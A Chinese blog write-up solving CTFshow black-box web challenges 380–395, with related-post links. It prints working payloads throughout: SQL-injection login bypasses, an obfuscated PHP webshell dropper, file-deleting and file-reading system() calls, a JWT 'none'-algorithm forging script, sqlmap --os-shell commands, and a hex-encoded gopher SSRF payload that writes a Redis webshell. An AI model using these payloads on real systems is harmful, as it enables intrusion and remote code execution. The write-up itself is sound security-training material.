CTFshow——黑盒测试

最新推荐文章于 2023-01-28 01:14:59 发布
最新推荐文章于 2023-01-28 01:14:59 发布
阅读量632 收藏
点赞数
分类专栏: 做题杂记~
DMIND
本文链接:https://blog.csdn.net/weixin_45669205/article/details/119681776
版权

文章目录

380

扫描一个目录,发现page.php,打开发现提示缺少id参数,且id参数控制php文件的打开,直接/page.php?id=flag即可
在这里插入图片描述

381

在首页源码中有可疑的路径,一层层打开看就发现flag了
在这里插入图片描述

382、383

两题依旧是访问后台:/alsckdfy/,弹出一个登陆界面,在账号处有SQL注入,admin'||1#即可登入

最后还是弱密码爆破一下,账密是admin:admin888

384

根据题目的描述就知道的要爆破了,按照要求写好生成字典的脚本,但还有六万多的数据,实在是有点大,直接看师傅的爆破结果了,密码是xy123

import string
a='0123456789'
b=string.ascii_lowercase

for w in b:
    for e in b:
        for i in a:
            for j in a: 
                for k in a:
                    print(w+e+i+j+k)

385

算是一个重装漏洞吧,install目录没有被403,按照提示访问/install/?install即可重置管理员密码,账密:admin:admin888

386

这题居然有个clear.php,自己字典没扫出来…
当然这个clear.php出处是/layui/css/tree.css,要我肯定不会尝试访问这个地址…
在这里插入图片描述
单纯访问clear.php似乎并不会删除文件,需要加点参数,比如file?file=./install/lock.dat就成功删除lock.dat。。秒啊。。最后去访问后台用默认密码登录即可

387

访问robots.txt
在这里插入图片描述
访问/debug/提示file not exist,经过前几题的经验,试试加上?file参数,然后没想到是文件读取
在这里插入图片描述
尝试包含日志文件然后写webshell,但是参数一直传不进去,再试试system('sleep 5')确定能够执行命令
在这里插入图片描述
那么传不了参数就在system中写文件:最后的flag是在check.php中

<?php system('cat /var/www/html/alsckdfy/check.php>/var/www/html/1.txt');?>

还有一种方法就RCE删除lock.dat进行重装

<?php unlink('/var/www/html/install/lock.dat');?>

在这里插入图片描述

388

此处有个编辑器:/alsckdfy/editor/,kindEditor编辑4.1.11是存在上传过滤不严的漏洞的
在这里插入图片描述
可允许上传一些危险后缀如doc、html、txt、zip等等
在这里插入图片描述
我们上传一个文件然后在/debug/?file=处包含一下即可

<?php
$a='metsys';

strrev($a)('echo PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+|base64 -d > /var/www/html/1.php');

在这里插入图片描述

访问后/debug/?file=/var/www/html/alsckdfy/attached/file/20210813/20210813152904_72474.txt就会生成webshell了

389

继续访问/debug/提示权限不足,看看cookie信息发现是引入了JWT

将算法改成none的JWT脚本

import jwt
 
# payload
token_dict = {
  "iss": "admin",
  "iat": 1628869261,
  "exp": 1628876461,
  "nbf": 1628869261,
  "sub": "admin",
  "jti": "cbcea3355b64ed215da14373ad82e234"
}

# headers
headers = {
  "alg": "none",
  "typ": "JWT"
}

jwt_token = jwt.encode(token_dict,  # payload, 有效载体 
					 key='',
                       headers=headers,  # json web token 数据结构包含两部分, payload(有效载体), headers(标头)
 					   algorithm="none",  # 指明签名算法方式, 默认也是HS256
                       ).decode('ascii')  # python3 编码后得到 bytes, 再进行解码(指明解码的格式), 得到一个str

print(jwt_token)

运行脚本得到的结果放在cookie中按照上一题的做法继续做即可

390

还是可以包含日志文件,其中UA头写unlink()函数删除lock.dat,这是前几题的做法
在这里插入图片描述
但是这题的意图是SQL注入,在页面中有id参数,测试了一下是有SQL注入的,直接SQLMAP跑

python sqlmap.py  -u "http://96105d8a-0108-4216-b454-80b8aebf9d52.challenge.ctf.show:8080/page.php?id=2"  --os-shell

391、392

在搜索处存在联合注入与延时注入

/search.php?title=-1' union select 1,2,3#

还是直接SQLMAP跑就行

 python sqlmap.py  -u "http://591cdf38-0c2b-4e64-bf4c-de106f770c90.challenge.ctf.show:8080/search.php?title=a" --os-shell

393

这题感觉思路很重要,考点是SSRF。
首先是继续SQLMAP跑search.php的注入点,跑不出os-shell--file-read的,只得简单看看ctfshow数据库下有什么表,其中有个link表,表中有url的字段,有点奇怪
在这里插入图片描述
在这里插入图片描述
回到浏览器中划到最下面多了个搜索引擎
在这里插入图片描述
点击百度发现是在当前页面中加载了百度的首页,尝试搜索但并不会跳转正常的百度搜索结果出来,那么可以猜测这个是从数据库中调用出来的,刚刚的link表的url控制了内容的读取,刚好也能对应这里了。
在这里插入图片描述
既然如此我们可以试试SSRF读取本地的flag,利用file:///flag来读取,但需要将它存到数据库中。

注入点同时还是堆叠注入,那么直接更新ulr的值为file:///flag,然后再点击一个搜索引擎即可

/search.php?title=a';update link set url='file:///flag' where id != 0;#

394、395

方法一:
继续使用update但报错error,怀疑是ban了某些字符,那么对file:///flag进行16进制

/search.php?title=a';update link set url=0x66696c653a2f2f2f666c6167 where id != 0;#

flag not here,再试试去/alsckdfy/check.php

/search.php?title=a';update link set url=0x66696c653a2f2f2f7661722f7777772f68746d6c2f616c73636b6466792f636865636b2e706870 where id != 0;#

黑名单是:

if(preg_match('/file|check|php/i', $id)){
    die('error');
  }

方法二:

看羽师傅的操作,还能攻击Redis,仔细想想也是,毕竟是SSRF,然后也是数据库相关的,如果有Redis服务那么也是一种攻击方式

这里一开始去用gopherus生成的payload去打一直不成功,最后看了羽师傅的操作还有更改字段类型的操作。确实,因为这个id字段是int类型的,接收不了这么多数据。下面的语句更改link表的url字段为text类型,学到了

/search.php?title=a';ALTER table link MODIFY COLUMN url text;#

在这里插入图片描述
最后打这个payload就会生成shell.php了:
/search.php?title=a';update link set url=0x676f706865723a2f2f3132372e302e302e313a363337392f5f2532413125304425304125323438253044253041666c757368616c6c25304425304125324133253044253041253234332530442530417365742530442530412532343125304425304131253044253041253234333425304425304125304125304125334325334670687025323073797374656d2532382532345f474554253542253237636d642532372535442532392533422532302533462533452530412530412530442530412532413425304425304125323436253044253041636f6e666967253044253041253234332530442530417365742530442530412532343325304425304164697225304425304125323431392530442530412f7661722f7777772f68746d6c2f312e7068702530442530412532413425304425304125323436253044253041636f6e666967253044253041253234332530442530417365742530442530412532343130253044253041646266696c656e616d65253044253041253234392530442530417368656c6c2e706870253044253041253241312530442530412532343425304425304173617665253044253041253041 where id != 0;#

D.MIND
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow 测试
Elite的博客
07-10 997
测试是一种软件测试方法,它主要关注于测试系统外部的功能和行为,而不考虑内部的实现细节。
ctfshow web入门 测试
最新发布
2301_81040377的博客
05-20 795
扫后台但是其实dirsearch自带的字典是没有的我们可以添加一下。访问clear.php然后发现并没有删除,原来是需要传参才可以删除。我是直接填的账号密码,至于账号为什么是admin我猜的。这些文件挨个试发现啥也没,最后仔细对比发现其实都是。进入页面发现有标题搜索了随便搞一个拿到注入点。这里有个菜鸟往事点进来就可以知道注入点。密码前2位是小写字母,后三位是数字。但是还有一种方法是万能密码。访问debug发现权限不足。但是没啥用哇,查看源代码。这里文章看的我好有感触。可以和上题一样直接秒了。
ctfshow测试
qq_61768489的博客
01-28 595
在search.php这里使用堆叠注入来实现向link表中添加url,我们已知三个字段,并且id控制选择页面。与上题一样,不一样的点在于这题将file字符ban了,可以利用16进制0x绕过。link表里的第三个字段是url,也就认为是搜索引擎那里跳转的url。这里可以利用ssrf可以添加跳转页面即url字段,比如添加。现在的目的应该是删除这个lock.dat然后重置密码。这里传入什么参数也是靠盒来猜了,用file参数。$id应该是传的参数,是php的文件名。search.php的注入点,跑不出。
CTFSHOW】web入门 测试
7ruth0hn的博客
09-29 1264
文章目录写在前面web380web381web382web383web384web385web386web387web388web389web390web391web392web393web394web395参考资料 写在前面 一直没搞过渗透,先学学测试吧 web380 进入题目发现是一个关于灯泡的悲伤故事,点进去,看到跳转到page_1.php页面。 我们访问page.php试试: 发现报错:$id.php,可以猜想需要传名称为id的参数,来访问id.php。我们访问page.php?id=1试试
ctfshow 测试web380-395 wp
m0_50936156的博客
04-22 381
目录web 380web 381web 381,382web 383-386web 387web 49web 50web 51web 52 记录下学习内容 web 380 开启题目,一个小型网站,四处浏览,没半点头绪,后来想到了目录扫描,结果线程最大为5否则504,看其他师傅的wp 有一个page.php页面 打开$id.php失败 猜到是file_get_contents,id传入page,出现关键部分 $html = file_get_contents('page_'.$id.'.php');
时钟——测试用例设计实例
03-04
我说说自己的套路吧:确定测试目标(其实就是确定测试用例的粒度)——提取测试元素——分类(其实就是一个整体的等价法)——针对各类进行分析(主要还是使用等价和边界)——正交表生成用例(因果图和判定表也是...
软件测试——测试
10-25
测试详情测试是一种常用的软件测试方法,它将被测软件看作一个打不开的盒,主要根据功能需求设计测试用例,进行测试。本章主要介绍几种常用的测试方法和测试工具,并通过实例介绍各种方法的运用。
软件测试技术实验报告——测试.doc
12-16
软件测试技术实验报告——测试.doc
CTFSHOW测试
羽的博客
01-15 1834
文章目录web380web381web382、383web384web385web386web387388web389web390web391web392web393 web380 payload 后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。 page.php?id=flag web381 payload 地址在源码里面 web382、383 还是上面的地址,万能密码登录得到flag web384 字典生成 import string s1=string.asci
CTFshow刷题日记-WEB-测试(web380-395)文件包含、日志包含getshell、SQL注入
Love&Share
10-07 3046
web380-扫目录文件包含 扫目录,存在page.php 访问发现报错,$id参数,可能存在文件包含 /page.php?id=flag web381-读源码找后台地址 page.php已经无法文件包含 看源码有一个可疑的路径 访问这个目录,最后注意一定要带上/ web382-383弱口令加万能密码 上题的/alsckdfy/目录访问之后是个登录界面 burp抓包爆破就行了,p字段,这些都可以拿到flag web384-爆破密码 提示:密码前2位是小写字母,后三位是数字 这肯定是后台密码了,
php测试,CTFSHOW测试
weixin_42573113的博客
03-28 365
文章目录web380payload后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。page.php?id=flagweb381payload地址在源码里面web382、383还是上面的地址,万能密码登录得到flagweb384字典生成import strings1=string.ascii_lowercases2=string.digitsf=open('dict...
ctfshow测试380-395
qq_50589021的博客
09-15 754
前言 总结测试思路 可能用到的字典 xy123 admin888 /install/index.php /clear.php /page.php /alsckdfy/index.php /debug web380——测试URL参数 web381——找后台 web382、383——sql万能密码 web384——爆破 开始过滤 爆破 字典生成: import string s1=string.ascii_lowercase # 小写字母a-z s2=string.digits # 数字 f=op
ctfshow__测试
qq_45655564的博客
07-04 401
web380-测试url参数 一开始什么也没有发现可以注入的地方,于是研究url参数。 发现每个页面都带有参数,如page_1.php,page_2.php啥的。 但是还是没有发现什么问题。 于是看了看别人的wp,发现page.php。 进去之后发现 $id.php很有问题。于是试了一下$id可不可以get传参进去,穿了一个page_1发现可以,于是试了一下另id=flag于是发现了flag web381-找后台 进去之后发现是同样的模板,于是继续查看page.php,结果发现了这个 这个想了想是没
ctfshow-web入门-测试(web380-386)
i_kei的博客
01-11 1110
鸣谢 感谢ctfshow平台对本栏目的大力支持(皮一下很开心) web380 打开页面之后,分析了网页源码,翻了半天css,什么都没找到 后来经过太空人师傅提示page.php,打开看看 提示打开$id.php失败,构造page.php?id=flag,查看源码发现flag web381 看了一晚上源码,愣是没发现这个目录,我醉了 访问/alsckdfy/即可获得flag web382 继续打开后台 第一种解法: 万能密码登录 例: admin 'or ‘1’=‘1’# 登录即可拿到flag 第
ctfshow_测试
qq_45951598的博客
12-22 468
文章目录WEB38WEB39web40web41 WEB38 payload 后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。 page.php?id=flag WEB39 这里爆出了路径,直接访问获取flag。 web40 这里和上一题一样,但是多了一个弱密码. web41 ...
CTF到渗透测试【浅谈渗透测试之信息收集】
Sp4rkW的博客
01-27 9897
前言 从一个ctf选手到一个渗透测试工程师,第一步需要改变的就是学习信息收集。渗透测试不是比赛,不会有提示,不会有查看源代码内藏提示等等,甚至你不可以使用扫描器(比如ctf中常见的AWVS),sqlmap等等。 工作中,一般进行的都是测试,你得考虑到厂商虽然授权允许你进行测试,但是你不可以使用dos,社工(一般这样就算getshell厂商也不认),不可以对厂商正常的运营造成破
ctf.show测试(web380-381)
wanan的博客
08-31 617
ctf.show测试(web380-381)
DDCTF2018-盒破解 详细WP
qq_41252520的博客
08-23 1028
分析 直接在IDA中打开,找到 main 函数 程序一开始需要我们输入一串 10 位长的密码,然后拼接字符串成 “flag-****.txt” 的形式,然后打开这个文件,读入数据到内存。实际上这个就是 flag 文件,只有当满足后续条件时,程序就会打印出来。这个条件就是输入一段passcode,让程序输出 “Binggo” 。 大致看上去,后面的这几个函数是与虚拟机有关的。作者自己编...
ctfshow测试
09-29
测试是一种测试方法,它是在没有访问内部...根据引用的信息,我们可以得出结论:ctfshow测试是一种针对系统安全进行的渗透测试测试者试图绕过名单功能并执行一系列攻击操作,以测试系统的安全性和鲁棒性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值